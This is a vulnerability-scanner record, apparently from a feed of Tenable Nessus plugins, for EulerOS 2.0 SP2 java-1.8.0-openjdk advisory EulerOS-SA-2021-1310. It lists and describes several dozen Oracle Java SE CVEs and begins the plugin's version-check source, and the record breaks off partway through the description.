{"nessus": [{"lastseen": "2021-02-25T17:09:31", "description": "According to the versions of the java-1.8.0-openjdk packages\ninstalled, the EulerOS installation on the remote host is affected by\nthe following vulnerabilities :\n\n - Vulnerability in the Java SE, Java SE Embedded\n component of Oracle Java SE (subcomponent: Utilities).\n Supported versions that are affected are Java SE:\n 7u221, 8u212, 11.0.3 and 12.0.1 Java SE Embedded:\n 8u211. Easily exploitable vulnerability allows\n unauthenticated attacker with network access via\n multiple protocols to compromise Java SE, Java SE\n Embedded. Successful attacks of this vulnerability can\n result in unauthorized ability to cause a partial\n denial of service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2019-2762)\n\n - Vulnerability in the Java SE, Java SE Embedded\n component of Oracle Java SE (subcomponent: Utilities).\n Supported versions that are affected are Java SE:\n 7u221, 8u212, 11.0.3 and 12.0.1 Java SE Embedded:\n 8u211. Easily exploitable vulnerability allows\n unauthenticated attacker with network access via\n multiple protocols to compromise Java SE, Java SE\n Embedded. Successful attacks of this vulnerability can\n result in unauthorized ability to cause a partial\n denial of service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2019-2769)\n\n - Vulnerability in the Java SE, Java SE Embedded\n component of Oracle Java SE (subcomponent: Security).\n Supported versions that are affected are Java SE:\n 8u212, 11.0.3 and 12.0.1 Java SE Embedded: 8u211.\n Difficult to exploit vulnerability allows\n unauthenticated attacker with network access via\n multiple protocols to compromise Java SE, Java SE\n Embedded. 
Successful attacks require human interaction\n from a person other than the attacker and while the\n vulnerability is in Java SE, Java SE Embedded, attacks\n may significantly impact additional products.\n Successful attacks of this vulnerability can result in\n unauthorized read access to a subset of Java SE, Java\n SE Embedded accessible data.(CVE-2019-2786)\n\n - Vulnerability in the Java SE component of Oracle Java\n SE (subcomponent: JCE). The supported version that is\n affected is Java SE: 8u212. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE. Successful attacks of this vulnerability can\n result in unauthorized ability to cause a partial\n denial of service (partial DOS) of Java\n SE.(CVE-2019-2842)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: 2D). Supported versions\n that are affected are Java SE: 7u231, 8u221, 11.0.4 and\n 13 Java SE Embedded: 8u221. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2019-2962)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Networking). Supported\n versions that are affected are Java SE: 7u231, 8u221,\n 11.0.4 and 13 Java SE Embedded: 8u221. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks require human interaction from a person other\n than the attacker. 
Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2019-2945)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Concurrency). Supported\n versions that are affected are Java SE: 7u231, 8u221,\n 11.0.4 and 13 Java SE Embedded: 8u221. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2019-2964)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Scripting). Supported\n versions that are affected are Java SE: 8u221, 11.0.4\n and 13 Java SE Embedded: 8u221. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized update, insert\n or delete access to some of Java SE, Java SE Embedded\n accessible data and unauthorized ability to cause a\n partial denial of service (partial DOS) of Java SE,\n Java SE Embedded.(CVE-2019-2975)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Networking). Supported\n versions that are affected are Java SE: 7u231, 8u221,\n 11.0.4 and 13 Java SE Embedded: 8u221. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. 
Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2019-2978)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: JAXP). Supported versions\n that are affected are Java SE: 7u231, 8u221, 11.0.4 and\n 13 Java SE Embedded: 8u221. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2019-2973)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: JAXP). Supported versions\n that are affected are Java SE: 7u231, 8u221, 11.0.4 and\n 13 Java SE Embedded: 8u221. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2019-2981)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Serialization). Supported\n versions that are affected are Java SE: 7u231, 8u221,\n 11.0.4 and 13 Java SE Embedded: 8u221. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2019-2983)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Kerberos). 
Supported\n versions that are affected are Java SE: 7u231, 8u221,\n 11.0.4 and 13 Java SE Embedded: 8u221. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via Kerberos to compromise Java SE,\n Java SE Embedded. While the vulnerability is in Java\n SE, Java SE Embedded, attacks may significantly impact\n additional products. Successful attacks of this\n vulnerability can result in unauthorized access to\n critical data or complete access to all Java SE, Java\n SE Embedded accessible data.(CVE-2019-2949)\n\n - Vulnerability in the Java SE product of Oracle Java SE\n (component: 2D). Supported versions that are affected\n are Java SE: 11.0.4 and 13. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE. Successful attacks of this vulnerability can\n result in unauthorized ability to cause a partial\n denial of service (partial DOS) of Java\n SE.(CVE-2019-2987)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: 2D). Supported versions\n that are affected are Java SE: 7u231, 8u221, 11.0.4 and\n 13 Java SE Embedded: 8u221. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2019-2988)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Networking). Supported\n versions that are affected are Java SE: 7u231, 8u221,\n 11.0.4 and 13 Java SE Embedded: 8u221. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. 
While the\n vulnerability is in Java SE, Java SE Embedded, attacks\n may significantly impact additional products.\n Successful attacks of this vulnerability can result in\n unauthorized creation, deletion or modification access\n to critical data or all Java SE, Java SE Embedded\n accessible data.(CVE-2019-2989)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: 2D). Supported versions\n that are affected are Java SE: 7u231, 8u221, 11.0.4 and\n 13 Java SE Embedded: 8u221. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2019-2992)\n\n - Vulnerability in the Java SE product of Oracle Java SE\n (component: Javadoc). Supported versions that are\n affected are Java SE: 7u231, 8u221, 11.0.4 and 13.\n Difficult to exploit vulnerability allows\n unauthenticated attacker with network access via\n multiple protocols to compromise Java SE. Successful\n attacks require human interaction from a person other\n than the attacker and while the vulnerability is in\n Java SE, attacks may significantly impact additional\n products. Successful attacks of this vulnerability can\n result in unauthorized update, insert or delete access\n to some of Java SE accessible data as well as\n unauthorized read access to a subset of Java SE\n accessible data.(CVE-2019-2999)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Serialization). Supported\n versions that are affected are Java SE: 7u241, 8u231,\n 11.0.5 and 13.0.1 Java SE Embedded: 8u231. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. 
Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2583)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Security). Supported\n versions that are affected are Java SE: 7u241, 8u231,\n 11.0.5 and 13.0.1 Java SE Embedded: 8u231. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via Kerberos to compromise Java SE,\n Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized update, insert\n or delete access to some of Java SE, Java SE Embedded\n accessible data.(CVE-2020-2590)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Serialization). Supported\n versions that are affected are Java SE: 7u241, 8u231,\n 11.0.5 and 13.0.1 Java SE Embedded: 8u231. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in takeover of\n Java SE, Java SE Embedded.(CVE-2020-2604)\n\n - Vulnerability in the Java SE product of Oracle Java SE\n (component: Libraries). Supported versions that are\n affected are Java SE: 7u241, 8u231, 11.0.5 and 13.0.1.\n Difficult to exploit vulnerability allows\n unauthenticated attacker with network access via\n multiple protocols to compromise Java SE. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE.(CVE-2020-2654)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Networking). Supported\n versions that are affected are Java SE: 7u241 and 8u231\n Java SE Embedded: 8u231. 
Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2020-2659)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Scripting). Supported\n versions that are affected are Java SE: 8u241, 11.0.6\n and 14 Java SE Embedded: 8u241. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2020-2754)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Scripting). Supported\n versions that are affected are Java SE: 8u241, 11.0.6\n and 14 Java SE Embedded: 8u241. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2020-2755)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Serialization). Supported\n versions that are affected are Java SE: 7u251, 8u241,\n 11.0.6 and 14 Java SE Embedded: 8u241. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. 
Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2756)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Serialization). Supported\n versions that are affected are Java SE: 7u251, 8u241,\n 11.0.6 and 14 Java SE Embedded: 8u241. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2757)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Security). Supported\n versions that are affected are Java SE: 7u251, 8u241,\n 11.0.6 and 14 Java SE Embedded: 8u241. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2773)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: JSSE). Supported versions\n that are affected are Java SE: 7u251, 8u241, 11.0.6 and\n 14 Java SE Embedded: 8u241. Easily exploitable\n vulnerability allows unauthenticated attacker with\n network access via HTTPS to compromise Java SE, Java SE\n Embedded. 
Successful attacks of this vulnerability can\n result in unauthorized ability to cause a partial\n denial of service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2781)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Lightweight HTTP Server).\n Supported versions that are affected are Java SE:\n 7u251, 8u241, 11.0.6 and 14 Java SE Embedded: 8u241.\n Difficult to exploit vulnerability allows\n unauthenticated attacker with network access via\n multiple protocols to compromise Java SE, Java SE\n Embedded. Successful attacks of this vulnerability can\n result in unauthorized update, insert or delete access\n to some of Java SE, Java SE Embedded accessible data as\n well as unauthorized read access to a subset of Java\n SE, Java SE Embedded accessible data.(CVE-2020-2800)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Concurrency). Supported\n versions that are affected are Java SE: 7u251, 8u241,\n 11.0.6 and 14 Java SE Embedded: 8u241. Easily\n exploitable vulnerability allows unauthenticated\n attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2830)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks require human interaction from a person other\n than the attacker. 
Successful attacks of this\n vulnerability can result in unauthorized update, insert\n or delete access to some of Java SE, Java SE Embedded\n accessible data.(CVE-2020-14798)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Serialization). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-14779)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: JNDI). Supported versions\n that are affected are Java SE: 7u271, 8u261, 11.0.8 and\n 15 Java SE Embedded: 8u261. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible\n data.(CVE-2020-14781)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Hotspot). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks require human interaction from a person other\n than the attacker. 
Successful attacks of this\n vulnerability can result in unauthorized update, insert\n or delete access to some of Java SE, Java SE Embedded\n accessible data as well as unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible\n data.(CVE-2020-14792)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks require human interaction from a person other\n than the attacker. Successful attacks of this\n vulnerability can result in unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible\n data.(CVE-2020-14796)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized update, insert or delete access to some of\n Java SE, Java SE Embedded accessible\n data.(CVE-2020-14797)\n\n - Vulnerability in the Java SE product of Oracle Java SE\n (component: Libraries). Supported versions that are\n affected are Java SE: 11.0.8 and 15. Easily exploitable\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE. Successful attacks of this vulnerability can\n result in unauthorized read access to a subset of Java\n SE accessible data.(CVE-2020-14803)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Libraries). 
Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized update, insert or delete access to some of\n Java SE, Java SE Embedded accessible\n data.(CVE-2020-14782)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 2, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-02-22T00:00:00", "title": "EulerOS 2.0 SP2 : java-1.8.0-openjdk (EulerOS-SA-2021-1310)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-2973", "CVE-2019-2992", "CVE-2019-2842", "CVE-2019-2945", "CVE-2020-2830", "CVE-2020-14803", "CVE-2020-14782", "CVE-2019-2762", "CVE-2020-2781", "CVE-2020-2755", "CVE-2020-2800", "CVE-2019-2983", "CVE-2020-2757", "CVE-2019-2999", "CVE-2020-14792", "CVE-2019-2962", "CVE-2019-2964", "CVE-2020-2590", "CVE-2020-14781", "CVE-2019-2949", "CVE-2020-2604", "CVE-2020-2583", "CVE-2020-14798", "CVE-2020-14779", "CVE-2020-14797", "CVE-2020-2773", "CVE-2019-2769", "CVE-2020-2659", "CVE-2019-2975", "CVE-2019-2988", "CVE-2020-14796", "CVE-2020-2756", "CVE-2019-2981", "CVE-2019-2786", "CVE-2019-2987", "CVE-2019-2989", "CVE-2019-2978", "CVE-2020-2654", "CVE-2020-2754"], "modified": "2021-02-22T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:java-1.8.0-openjdk", "p-cpe:/a:huawei:euleros:java-1.8.0-openjdk-headless", "p-cpe:/a:huawei:euleros:java-1.8.0-openjdk-devel", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2021-1310.NASL", "href": "https://www.tenable.com/plugins/nessus/146641", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable 
Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146641);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/24\");\n\n script_cve_id(\n \"CVE-2019-2762\",\n \"CVE-2019-2769\",\n \"CVE-2019-2786\",\n \"CVE-2019-2842\",\n \"CVE-2019-2945\",\n \"CVE-2019-2949\",\n \"CVE-2019-2962\",\n \"CVE-2019-2964\",\n \"CVE-2019-2973\",\n \"CVE-2019-2975\",\n \"CVE-2019-2978\",\n \"CVE-2019-2981\",\n \"CVE-2019-2983\",\n \"CVE-2019-2987\",\n \"CVE-2019-2988\",\n \"CVE-2019-2989\",\n \"CVE-2019-2992\",\n \"CVE-2019-2999\",\n \"CVE-2020-14779\",\n \"CVE-2020-14781\",\n \"CVE-2020-14782\",\n \"CVE-2020-14792\",\n \"CVE-2020-14796\",\n \"CVE-2020-14797\",\n \"CVE-2020-14798\",\n \"CVE-2020-14803\",\n \"CVE-2020-2583\",\n \"CVE-2020-2590\",\n \"CVE-2020-2604\",\n \"CVE-2020-2654\",\n \"CVE-2020-2659\",\n \"CVE-2020-2754\",\n \"CVE-2020-2755\",\n \"CVE-2020-2756\",\n \"CVE-2020-2757\",\n \"CVE-2020-2773\",\n \"CVE-2020-2781\",\n \"CVE-2020-2800\",\n \"CVE-2020-2830\"\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : java-1.8.0-openjdk (EulerOS-SA-2021-1310)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the java-1.8.0-openjdk packages\ninstalled, the EulerOS installation on the remote host is affected by\nthe following vulnerabilities :\n\n - Vulnerability in the Java SE, Java SE Embedded\n component of Oracle Java SE (subcomponent: Utilities).\n Supported versions that are affected are Java SE:\n 7u221, 8u212, 11.0.3 and 12.0.1 Java SE Embedded:\n 8u211. Easily exploitable vulnerability allows\n unauthenticated attacker with network access via\n multiple protocols to compromise Java SE, Java SE\n Embedded. 
Successful attacks of this vulnerability can\n result in unauthorized ability to cause a partial\n denial of service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2019-2762)\n\n - Vulnerability in the Java SE, Java SE Embedded\n component of Oracle Java SE (subcomponent: Utilities).\n Supported versions that are affected are Java SE:\n 7u221, 8u212, 11.0.3 and 12.0.1 Java SE Embedded:\n 8u211. Easily exploitable vulnerability allows\n unauthenticated attacker with network access via\n multiple protocols to compromise Java SE, Java SE\n Embedded. Successful attacks of this vulnerability can\n result in unauthorized ability to cause a partial\n denial of service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2019-2769)\n\n - Vulnerability in the Java SE, Java SE Embedded\n component of Oracle Java SE (subcomponent: Security).\n Supported versions that are affected are Java SE:\n 8u212, 11.0.3 and 12.0.1 Java SE Embedded: 8u211.\n Difficult to exploit vulnerability allows\n unauthenticated attacker with network access via\n multiple protocols to compromise Java SE, Java SE\n Embedded. Successful attacks require human interaction\n from a person other than the attacker and while the\n vulnerability is in Java SE, Java SE Embedded, attacks\n may significantly impact additional products.\n Successful attacks of this vulnerability can result in\n unauthorized read access to a subset of Java SE, Java\n SE Embedded accessible data.(CVE-2019-2786)\n\n - Vulnerability in the Java SE component of Oracle Java\n SE (subcomponent: JCE). The supported version that is\n affected is Java SE: 8u212. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE. 
Successful attacks of this vulnerability can\n result in unauthorized ability to cause a partial\n denial of service (partial DOS) of Java\n SE.(CVE-2019-2842)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: 2D). Supported versions\n that are affected are Java SE: 7u231, 8u221, 11.0.4 and\n 13 Java SE Embedded: 8u221. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2019-2962)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Networking). Supported\n versions that are affected are Java SE: 7u231, 8u221,\n 11.0.4 and 13 Java SE Embedded: 8u221. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks require human interaction from a person other\n than the attacker. Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2019-2945)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Concurrency). Supported\n versions that are affected are Java SE: 7u231, 8u221,\n 11.0.4 and 13 Java SE Embedded: 8u221. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2019-2964)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Scripting). 
Supported\n versions that are affected are Java SE: 8u221, 11.0.4\n and 13 Java SE Embedded: 8u221. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized update, insert\n or delete access to some of Java SE, Java SE Embedded\n accessible data and unauthorized ability to cause a\n partial denial of service (partial DOS) of Java SE,\n Java SE Embedded.(CVE-2019-2975)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Networking). Supported\n versions that are affected are Java SE: 7u231, 8u221,\n 11.0.4 and 13 Java SE Embedded: 8u221. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2019-2978)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: JAXP). Supported versions\n that are affected are Java SE: 7u231, 8u221, 11.0.4 and\n 13 Java SE Embedded: 8u221. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2019-2973)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: JAXP). Supported versions\n that are affected are Java SE: 7u231, 8u221, 11.0.4 and\n 13 Java SE Embedded: 8u221. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. 
Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2019-2981)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Serialization). Supported\n versions that are affected are Java SE: 7u231, 8u221,\n 11.0.4 and 13 Java SE Embedded: 8u221. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2019-2983)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Kerberos). Supported\n versions that are affected are Java SE: 7u231, 8u221,\n 11.0.4 and 13 Java SE Embedded: 8u221. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via Kerberos to compromise Java SE,\n Java SE Embedded. While the vulnerability is in Java\n SE, Java SE Embedded, attacks may significantly impact\n additional products. Successful attacks of this\n vulnerability can result in unauthorized access to\n critical data or complete access to all Java SE, Java\n SE Embedded accessible data.(CVE-2019-2949)\n\n - Vulnerability in the Java SE product of Oracle Java SE\n (component: 2D). Supported versions that are affected\n are Java SE: 11.0.4 and 13. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE. Successful attacks of this vulnerability can\n result in unauthorized ability to cause a partial\n denial of service (partial DOS) of Java\n SE.(CVE-2019-2987)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: 2D). 
Supported versions\n that are affected are Java SE: 7u231, 8u221, 11.0.4 and\n 13 Java SE Embedded: 8u221. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2019-2988)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Networking). Supported\n versions that are affected are Java SE: 7u231, 8u221,\n 11.0.4 and 13 Java SE Embedded: 8u221. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. While the\n vulnerability is in Java SE, Java SE Embedded, attacks\n may significantly impact additional products.\n Successful attacks of this vulnerability can result in\n unauthorized creation, deletion or modification access\n to critical data or all Java SE, Java SE Embedded\n accessible data.(CVE-2019-2989)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: 2D). Supported versions\n that are affected are Java SE: 7u231, 8u221, 11.0.4 and\n 13 Java SE Embedded: 8u221. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in 